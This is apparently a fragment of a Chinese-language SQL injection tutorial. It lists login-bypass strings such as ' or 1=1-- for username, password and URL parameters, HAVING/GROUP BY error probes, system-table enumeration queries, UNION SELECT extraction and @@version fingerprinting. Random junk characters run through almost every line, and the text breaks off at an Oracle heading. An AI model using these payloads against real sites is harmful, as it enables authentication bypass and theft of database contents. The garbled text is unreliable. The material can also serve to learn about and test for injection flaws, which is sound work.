- b! k6 h2 O, h/ M2 ?) lSQL注射是通过页面中的输入来欺骗使得其可以运行我们构造的查询或者别的命令,我们知道在WEB上面有很多供我们输入参数的地方,比如用户名、密码或者E_mail。 # n$ {6 y% [' H2 B; G) u- C0 M% i6 V- H. U
$ w: @* _5 l; {1 S6 E: N0 Y
8 O* F' Z! k Y; v' ?2 |: J+ K( `
2、漏洞测试, z" h) J* k; H0 }& V- N
2 p, _$ E+ \" p+ C R7 }
最开始我们应该从最简单的来试: 5 R7 T- b3 H8 a4 L 5 I+ B! s6 V/ ~" n/ u6 ?6 O) w- Login:’ or 1=1–1 W- v$ A7 x) Y% ~" {4 Z, Z
8 m8 O% n' i* y" K2 {- E5 E- Pass:’ or 1=1– / d0 w5 z/ f m8 {; `! E6 o* ^
- http://website/index.asp?id=’ or 1=1–' e& _3 s7 v, Q0 W7 e, ]4 E" R9 {$ ]6 |
A9 X" a5 o+ B N" J还有下面这样的方式:( U6 T$ v ]! A$ C9 Y/ _ ?
& o1 K& B# C: Z
- ‘ having 1=1– 8 G; `2 @" C* D- v. h2 M2 ?; o0 f - T: n- s) x% L! ?% `: |- ‘ group by userid having 1=1– 5 R5 C* X9 R9 I+ ^4 z, n M0 |7 ?5 h, w+ W4 _
- ‘ SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = ‘tablename’)–7 i( T* J8 q# I( J ?3 z. C
8 J5 k# L# r0 O8 }; ~0 p, d
- ‘ union select sum(columnname) from tablename–! ], H* x; r/ B+ A \+ t* |; y o
c: L* K: _0 Q8 F: d" R9 T
3 k! b. j n( y2 W3 h4 l ' F! D* j# V1 ]2 Q/ W: m7 }3、收集信息8 z9 g' B$ P0 G) d. c g
2 {+ v4 t3 O0 o5 Z& \* c- ‘ or 1 in (select @@version)–, T" j9 Z: Z8 K* {$ T2 w T- [4 G' D7 e
7 \1 D4 ^9 _1 B, q8 O
- ‘ union all select @@version–0 A$ k; g; z2 U
& J9 Z: V: A) E+ d& f
上面就可以得到系统的版本和补丁信息。- f+ S1 m. F1 f3 ?( ]6 P% U) M
! \9 r& H! d, j* |
4 E+ t# Y$ y4 ^/ p # D# M) B! x7 ]" k7 X4、数据类型- k1 N. J" L& V% e# a) b5 k
5 Q7 a7 q' F8 b2 }; J$ J S- ~
Oracle数据库>>0 R' u0 g S: a5 v7 z2 U. F# O6 h